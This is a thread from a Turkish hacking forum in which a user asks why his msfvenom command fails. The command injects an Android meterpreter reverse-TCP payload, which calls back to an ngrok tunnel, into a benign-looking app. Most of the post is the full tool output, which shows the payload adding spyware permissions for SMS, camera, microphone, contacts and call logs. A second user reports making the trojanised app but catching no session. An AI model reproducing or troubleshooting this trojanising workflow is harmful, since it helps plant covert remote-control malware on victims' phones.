Metasploit Apktool hatası

Andro234

Yeni üye
9 Şub 2023
6
0
Metasploit android payloadını msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=7.tcp.eu.ngrok.io LPORT=18857 -a dalvik -o BeautifulArts.apk kullanarak apk ya injekte etmeye çalışıyorum

[-] No platform was selected, choosing Msf::Module::platform::Android from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.example.beautifularts.zkysj
[*] Loading /tmp/d20230214-2611-7i9p4s/original/smali_classes8/com/example/beautifularts/MainActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230214-2611-7i9p4s/output.apk
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether resources has changed...
I: Building resources...
W: Failed to generate resource table for split ''
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:55: error: Error: Resource is not public. (at 'm3_ref_palette_dynamic_tertiary0' with value '@android:color/Indigo_800').
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_183821904967499195044906669203137412419.tmp, p, --forced-package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL7492742344093893341.tmp, -e, /tmp/APKTOOL9040017032126172148.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20230214-2611-7i9p4s/original/res, -M, /tmp/d20230214-2611-7i9p4s/original/AndroidManifest.xml]
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:55: error: resource android:color/Indigo_800 is private.
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:56: error: resource android:color/Indigo_700 is private.
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:58: error: resource android:color/GM2_grey_800 is private.
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:59: error: resource android:color/Blue_800 is private.
W: /tmp/d20230214-2611-7i9p4s/original/res/values-v31/colors.xml:60: error: resource android:color/Blue_700 is private.
W: error: failed linking references.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_14107153413172125808654640018602675149.tmp, link, -o, /tmp/APKTOOL15622656092814210981.tmp, --package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1, --version-name, 1.0, --no-auto-version, --no-version-vectors, --no-version-transitions, --no-resource-deduping, -e, /tmp/APKTOOL10457262126801659771.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, --manifest, /tmp/d20230214-2611-7i9p4s/original/AndroidManifest.xml, /tmp/d20230214-2611-7i9p4s/original/build/resources.zip]
Error: Unable to rebuild apk with apktool
böyle bir hata veriyor başka apk ile denediğimde düzgün çalışıyor sorun apk da ise ne yaparsam düzeltirim bu sorunu
 

Severuz2

Üye
10 Nis 2022
124
47
Dademin aynısını denedim hata vermeden dosyayı oluşturdu ama uygulamaya girdiğimde meterpreter yakalayamadı ve başarılı olmadı hatayı nerede yaptığımı arıyorum
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.